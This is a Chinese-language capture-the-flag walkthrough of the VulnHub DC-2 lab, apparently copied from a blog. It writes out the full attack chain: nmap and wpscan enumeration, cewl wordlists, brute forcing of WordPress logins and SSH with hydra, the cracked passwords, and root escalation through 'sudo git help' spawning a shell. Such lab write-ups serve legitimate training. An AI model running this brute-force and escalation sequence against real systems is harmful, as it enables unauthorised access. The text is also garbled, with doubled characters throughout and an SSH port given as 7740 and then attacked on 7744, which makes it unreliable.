實(shí)驗(yàn)環(huán)境準(zhǔn)備：

• kali：172.25.0.69
• DC-2: MAC地址：00:0C:29:FE:17:D2
  DC-2靶機(jī)下載地址：https://www.vulnhub.com/entry/dc-2,311/

0x01 主機(jī)發(fā)現(xiàn)

netdiscover -i eth0 -r 172.25.0.0/24 //存活主機(jī)探測(cè)
探測(cè)到DC-2靶機(jī)的IP地址為 172.25.0.64

image.png

0x02 端口掃描

nmap -A -p- 172.25.0.64 //全端口掃描
探測(cè)到80端口開(kāi)啟了HTTP服務(wù)，7740端口開(kāi)啟了ssh服務(wù)

image.png

• windows：C:\Windows\System32\drivers\etc

• linux：/etc/hosts

  
  
  image.png
  
  

  成功訪(fǎng)問(wèn)web服務(wù)，發(fā)現(xiàn)該網(wǎng)站是使用wordpress cms構(gòu)建。

  
  
  image.png

0x03 信息收集

使用wordpress專(zhuān)用掃描器wpscan進(jìn)行網(wǎng)站掃描
wpscan --url [http://dc-2](http://dc-2) -e vp,u --plugins-detection mixed
枚舉得到網(wǎng)站后臺(tái)用戶(hù)，并制作用戶(hù)字典
-e 枚舉 u用戶(hù)名 --plugins-detection vp含有漏洞的插件 mixed 混合模式（主動(dòng)加被動(dòng)）

image.png

image.png

image.png

0x04 密碼爆破

cewl 爬行網(wǎng)站來(lái)制作一個(gè)密碼字典
cewl dc-2 > pass.dic
用wpscan來(lái)進(jìn)行表單密碼爆破
wpscan --url http://dc-2 -U user.dic -P pass.dic
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

image.png

image.png

image.png

使用hydra進(jìn)行ssh爆破，爆破得到ssh賬戶(hù)tom密碼為parturient
hydra ssh://dc-2 -L user.dic -P pass.dic -vV -s 7744 -t 50 -o hydra.ssh

image.png

image.png

image.png

image.png

image.png

image.png

image.png

0x05 提權(quán)

兩種方法
1、sudo git help config
在末行命令模式輸入  !/bin/bash 或 !'sh' 完成提權(quán)
2、sudo git -p help
      !/bin/bash

提權(quán)成功，拿到該靶機(jī)最高權(quán)限r(nóng)oot

image.png

在root家目錄拿下最后一個(gè)flag

image.png